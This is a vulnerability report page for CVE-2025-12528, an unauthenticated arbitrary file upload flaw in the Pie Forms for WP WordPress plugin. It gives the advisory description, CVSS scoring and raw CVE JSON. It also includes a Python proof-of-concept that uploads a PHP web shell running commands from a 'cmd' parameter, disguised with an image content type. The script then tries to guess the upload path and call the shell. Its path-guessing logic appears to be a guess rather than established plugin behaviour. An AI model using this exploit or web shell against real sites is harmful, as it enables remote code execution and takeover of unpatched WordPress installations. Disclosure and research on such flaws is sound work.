Security Vulnerability Report
中文
CVE-2025-12528 CVSS 8.1 HIGH

CVE-2025-12528

Published: 2025-11-18 09:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Pie Forms for WP plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6 via the format_classic function. This is due to insufficient file type validation where the validate_classic method validates file extensions and sets error messages but does not prevent the file upload process from continuing. This makes it possible for unauthenticated attackers to upload files with dangerous extensions such as PHP, which makes remote code execution possible. In order to exploit this vulnerability, the attacker needs to guess the directory in which the file is placed (which is a somewhat predictable hash). In addition to that, the file name is generated using a secure hash method, limiting the exploitability of this vulnerability.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Pie Forms for WP < 1.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import hashlib import time # CVE-2025-12528 PoC - Pie Forms for WP Arbitrary File Upload # Target: WordPress site with Pie Forms for WP plugin <= 1.6 target_url = "http://target-wordpress-site.com" form_id = 1 # Target form ID # Malicious PHP file content for RCE php_payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" def upload_malicious_file(): """Upload malicious PHP file via vulnerable endpoint""" upload_url = f"{target_url}/wp-admin/admin-ajax.php" files = { 'pieForms': (f'malicious_{int(time.time())}.php', php_payload, 'image/png') } data = { 'action': 'pie_form_submit', 'form_id': form_id, 'pie_form_data': 'test' } try: response = requests.post(upload_url, data=data, files=files, timeout=10) print(f"Upload response: {response.status_code}") return response except Exception as e: print(f"Upload failed: {e}") return None def calculate_upload_path(form_id, timestamp): """Calculate predictable upload directory hash""" hash_input = f"{form_id}_{timestamp}" dir_hash = hashlib.md5(hash_input.encode()).hexdigest()[:8] path = f"/wp-content/uploads/pie-forms/{dir_hash}/" return path def main(): print("CVE-2025-12528 PoC - Pie Forms for WP File Upload") print("=" * 50) # Step 1: Upload malicious file print("[+] Step 1: Uploading malicious PHP file...") response = upload_malicious_file() # Step 2: Calculate file location timestamp = int(time.time()) upload_path = calculate_upload_path(form_id, timestamp) print(f"[+] Step 2: Calculated upload path: {upload_path}") # Step 3: Access uploaded file print("[+] Step 3: Attempting to access uploaded file...") # Note: Actual filename needs to be determined from response print("\n[!] Manual verification required:") print(f"[!] Check response headers for uploaded file path") print(f"[!] Access: {target_url}{upload_path}<filename>.php?cmd=whoami") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12528", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:48.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Pie Forms for WP plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6 via the format_classic function. This is due to insufficient file type validation where the validate_classic method validates file extensions and sets error messages but does not prevent the file upload process from continuing. This makes it possible for unauthenticated attackers to upload files with dangerous extensions such as PHP, which makes remote code execution possible. In order to exploit this vulnerability, the attacker needs to guess the directory in which the file is placed (which is a somewhat predictable hash). In addition to that, the file name is generated using a secure hash method, limiting the exploitability of this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L18", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L331", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L475", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4941a0ce-67f1-430d-bbad-3c97a4ed449e?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.